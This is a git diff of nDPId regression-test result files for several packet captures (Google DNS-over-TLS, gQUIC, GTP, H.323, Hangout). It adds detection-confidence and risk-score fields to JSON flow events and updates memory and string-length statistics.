+01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01412{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00822{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
 00169{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","total-events-serialized":59}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 532/532
@@ -65,10 +65,10 @@
 ~~ total active/idle flows...: 8/8
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4646609 bytes
-~~ total memory freed........: 4646609 bytes
-~~ total allocations/frees...: 100171/100171
+~~ total memory allocated....: 4728594 bytes
+~~ total memory freed........: 4728594 bytes
+~~ total allocations/frees...: 101761/101761
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 174 chars
-~~ json string max len.......: 1311 chars
-~~ json string avg len.......: 812 chars
+~~ json string max len.......: 1417 chars
+~~ json string avg len.......: 865 chars
diff --git a/test/results/gquic.pcap.out b/test/results/gquic.pcap.out
index a88c7afc5..4f87bceec 100644
--- a/test/results/gquic.pcap.out
+++ b/test/results/gquic.pcap.out
@@ -1,8 +1,8 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"gquic.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02260{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591876186378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1591876186378,"pkt":"6PckTkFdoMWJ9P+XCABFAAVieo1AAIARvdoKLAUZ2DrVo+6pAbsFTko2w1EwNTAIAXaX8XoV5u8AAEU0NFnBgsF5hkBVQ9QcdhAQB7AX4STVuX+cZkTXcyq7Q06MKI3IMV7nn3XwVsYd8lSM2UQ2Mh\/Lz0P54TH133\/BjF8sKcZx48\/VepMyZjozNf6hUhocgBAvamo29IXHVqILxpkl4wjCzjbjeV119chifFcXxaTjllFkxsh3XmLG5348E\/qK2TLLnMy43JAHw6S2e1v2BO4WXkya\/bcrsjPnQYikRvTxH8li9ZflQ5PttsYcSUtQigVmzX+3zu6YljUMgwCKrGbUc4ym0tN37M5ly\/uhm21+A6fvtyySGNQfP7wJOsR1iWGsA6NR+V\/fmgbvfd72gKd0sTHFADbRPSKYDc0XDK\/X8vG8GXGEknHbOT7DGSzLKpHYvLrwIaFjsweHE6gkta44k2oP3lJ5y\/ohylLleMWOzrznvbvHmPDTo6fznFlCwcMwiT5bU7kKdr22dfJC4HZKXgrfdx\/kyr9W7YgF8ndv1gEMp60hGoa3HeIkNrwcimMUj8lo1MQMLSdfIURLgLYuYXeqNU9nrCpCTOHF8rljnTLtemFl5GKnW4QO+Vn8YQU0wC2WniPFD0JOSE\/9\/8uhjdFWVDMbiGWhYk1SCdcSCnwwatMyU\/DcpZqDI25eb58WZqvNqtnsCmojU\/8N4SjVKXFe6sqZF9Vu2GvgHDvSqxDzjeY9qlts4TuIbe+gH+w1MKU7JxNtGZ08YyKdDEVfiklQ\/xyvSgH5AGRqlnD6igJ7NF54pjKD67q+V\/b7AzUVhGIbpajDS4rvn+fDdhXSGqLFbtHNBw9zOlfyLlg3QCkztn+awCGkuUrUQJWRuzHeXcQ9Pm+GTWr4ztxdNe8GOdcH0fw\/02FqwqbZa0xgXb6ogDH\/Z7u3OTt5CsB\/hPp4imvHezect7LAbuRcIJ+tmXKeqwNdUGoyV614kYKA0aTDm4QbBmp4nIg9dspzjXHExZ33U9zxLwZ8DYwQJDoYhywocb4+jKp5OhFT0Egt5ANj4PPsKNBEjNDxnpAKCiI11YkYMyYj1BSFJ2mKW5kFXZ2\/Uk7W0jKMRykBFSaIJ+fwu1W4yhNjDR69KpOGwGw5d47DA9U+Gj7qbRCpjgb1v145AzbIQNTU\/mwU8gqij0o+rVb\/pUEtWMRho\/Yukqvj0PDpk20u\/iMNduvSEQAQLt7IA31zZMJsdzUDXqeH4lvAJTdAXDM+BfHOutfryXO0ilZKrrhbJmj03RyAieSkoI7y9TYI7udqZUukM2QcgXS180FYjb94yLuFlXG0La9U7oT6UzgYEOrDdq4bcoWorhw9j4EjTTcsFMkNO8f65TlicSD0KdGh7ggCR8NtD2qMSi4KIMxq9IHmGPWBJODrdc1+LXcmA3ApoiY81zbK2QPTdK0LHWSdeauC3LCzY9zJ5bEtZvA4hiamdfZl4E5cxC\/raRilWW9+sNuXDrAH9rw48q66KiLSEC63yDpS1q549REO+OCEIx8SKQQoN1W6tspnVZ3EKLwuCby00TS84gP7\/ke1UZsRSUTrMeCETmkIya9DRfJn3gxYto584jg1Sk6Axi4aJ8MlnhdHfC\/0XWQrVM1UOD3\/J3K5XZUZKJ5vUWJzfBTgAe8J4\/heUMD2WmkBuQIER6hh9JGvwyZ2I6vJO7KXsorNCeXZA6iFfdtk90sqEl67LnWUAJmZ\/6NzgV\/JXrGoQRR0uqoWVC\/xj1u+c66MRH8y3Tf8DUoZ1L57SrRzGrkWBB6B2RSkfxWVzZUSCgEgPU4Lp+fnv6pDzh8zifmLUphU5Jycotx7"}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"canary Chrome\/85.0.4169.0 Windows NT 10.0; Win64; x64"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"canary Chrome\/85.0.4169.0 Windows NT 10.0; Win64; x64"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1591876186378,"flow_last_seen":1591876186378,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1591876186378,"l3_proto":"ip4","src_ip":"10.44.5.25","dst_ip":"216.58.213.163","src_port":61097,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"gquic.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600418 bytes
-~~ total memory freed........: 4600418 bytes
-~~ total allocations/frees...: 99565/99565
+~~ total memory allocated....: 4685371 bytes
+~~ total memory freed........: 4685371 bytes
+~~ total allocations/frees...: 101155/101155
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
 ~~ json string max len.......: 2265 chars
diff --git a/test/results/gtp_false_positive.pcapng.out b/test/results/gtp_false_positive.pcapng.out
index a6c1e24d9..fa9e904d9 100644
--- a/test/results/gtp_false_positive.pcapng.out
+++ b/test/results/gtp_false_positive.pcapng.out
@@ -7,11 +7,11 @@
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1638856441836,"flow_last_seen":1638856511476,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1639664897536,"l3_proto":"ip4","src_ip":"24.1.33.66","dst_ip":"62.56.122.232","src_port":29255,"dst_port":3386,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639664897536,"flow_last_seen":1639664897536,"flow_idle_time":180000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1639664897536,"l3_proto":"ip4","src_ip":"50.7.111.134","dst_ip":"103.225.103.159","src_port":17000,"dst_port":2123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639664897536,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":16,"ts_msec":1639664897536,"pkt":"AAAAAAAAAAgAcgnYCABFaAAk3R5AADMR+TQyB2+GZ+Fnn0JoCEsAEMsJNwMAAEIAAAAAAAAAAAA="}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639664897536,"flow_last_seen":1639664897536,"flow_idle_time":180000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1640630605457,"l3_proto":"ip4","src_ip":"50.7.111.134","dst_ip":"103.225.103.159","src_port":17000,"dst_port":2123,"l4_proto":"udp","ndpi": {"proto":"GTP","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639664897536,"flow_last_seen":1639664897536,"flow_idle_time":180000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1640630605457,"l3_proto":"ip4","src_ip":"50.7.111.134","dst_ip":"103.225.103.159","src_port":17000,"dst_port":2123,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"GTP","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639664897536,"flow_last_seen":1639664897536,"flow_idle_time":180000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1640630605457,"l3_proto":"ip4","src_ip":"50.7.111.134","dst_ip":"103.225.103.159","src_port":17000,"dst_port":2123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1640630605457,"flow_last_seen":1640630605457,"flow_idle_time":180000,"flow_min_l4_payload_len":326,"flow_max_l4_payload_len":326,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1640630605457,"l3_proto":"ip4","src_ip":"119.185.190.173","dst_ip":"66.86.98.114","src_port":2123,"dst_port":50140,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1640630605457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":368,"pkt_l4_len":334,"ts_msec":1640630605457,"pkt":"AAAAAAAAAAgAF2izCABFAAFiEjRAAD0RTyh3ub6tQlZicghLw9wBTnl2RgEAAAJ5AwDIAMWLvaZzN8g7AAAAAHAALV6UJ\/cTHdx+UcbekdlVsrIQyORBtJYGjhwit4VPN8cgIpZwuzYVz0TO+kH8rnowgXXPb2P\/JTt2WeT4FCyPlfScgvudUxqPf1kwZMd0KmXiXleYPXTNqftx0xJj\/Kb2FN1yrSOQIVUjnqcH8TbL6jgJymGUAAAAfj1DGkvghwUAAAAAAQAAAAABAAAAAAAAAAAAAgBvbQcAAAAAAAAASgABBwAAAAgAYXV0b0FsZ28BADEQAGF1dG9Jbml0TGltaXRSZXMBADAMAGF1dG9MaW1pdFJlcwEAMAcAYndlQWxnbwEAMQwAZG91Ymxlaml0dGVyAQAwCQBwcm9iZVN0cmEBADAGAHNka2JiciAAYWNrVGltZU91dDoyMDB8YWNrVGltZUxlbmd0aDo2MDA="}
-00622{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1640630605457,"flow_last_seen":1640630605457,"flow_idle_time":180000,"flow_min_l4_payload_len":326,"flow_max_l4_payload_len":326,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1640630605457,"l3_proto":"ip4","src_ip":"119.185.190.173","dst_ip":"66.86.98.114","src_port":2123,"dst_port":50140,"l4_proto":"udp","ndpi": {"proto":"GTP","breed":"Acceptable","category":"Network"}}
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1640630605457,"flow_last_seen":1640630605457,"flow_idle_time":180000,"flow_min_l4_payload_len":326,"flow_max_l4_payload_len":326,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1640630605457,"l3_proto":"ip4","src_ip":"119.185.190.173","dst_ip":"66.86.98.114","src_port":2123,"dst_port":50140,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"GTP","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1640630605457,"flow_last_seen":1640630605457,"flow_idle_time":180000,"flow_min_l4_payload_len":326,"flow_max_l4_payload_len":326,"flow_tot_l4_payload_len":326,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1640630605457,"l3_proto":"ip4","src_ip":"119.185.190.173","dst_ip":"66.86.98.114","src_port":2123,"dst_port":50140,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00168{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"gtp_false_positive.pcapng","alias":"nDPId-test","total-events-serialized":16}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -22,10 +22,10 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 2
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597432 bytes
-~~ total memory freed........: 4597432 bytes
-~~ total allocations/frees...: 99566/99566
+~~ total memory allocated....: 4681729 bytes
+~~ total memory freed........: 4681729 bytes
+~~ total allocations/frees...: 101156/101156
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 173 chars
 ~~ json string max len.......: 884 chars
-~~ json string avg len.......: 590 chars
+~~ json string avg len.......: 591 chars
diff --git a/test/results/h323-overflow.pcap.out b/test/results/h323-overflow.pcap.out
index afcc9f6c6..4f2d1a437 100644
--- a/test/results/h323-overflow.pcap.out
+++ b/test/results/h323-overflow.pcap.out
@@ -1,7 +1,7 @@
 00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"h323-overflow.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":946681200000,"pkt":"IiIiIiIiIiIiIiIjCABFAAAsRr1AAIAG+9DAqAEBwKgBAnppAFA5fV1j4FJ\/s1AYQD3UwAAAAwAABA=="}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00568{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -12,10 +12,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596906 bytes
-~~ total memory freed........: 4596906 bytes
-~~ total allocations/frees...: 99555/99555
+~~ total memory allocated....: 4681859 bytes
+~~ total memory freed........: 4681859 bytes
+~~ total allocations/frees...: 101145/101145
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
-~~ json string max len.......: 611 chars
-~~ json string avg len.......: 447 chars
+~~ json string max len.......: 647 chars
+~~ json string avg len.......: 463 chars
diff --git a/test/results/hangout.pcap.out b/test/results/hangout.pcap.out
index cc778c62a..13d1ce69c 100644
--- a/test/results/hangout.pcap.out
+++ b/test/results/hangout.pcap.out
@@ -1,10 +1,10 @@
 00439{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"hangout.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
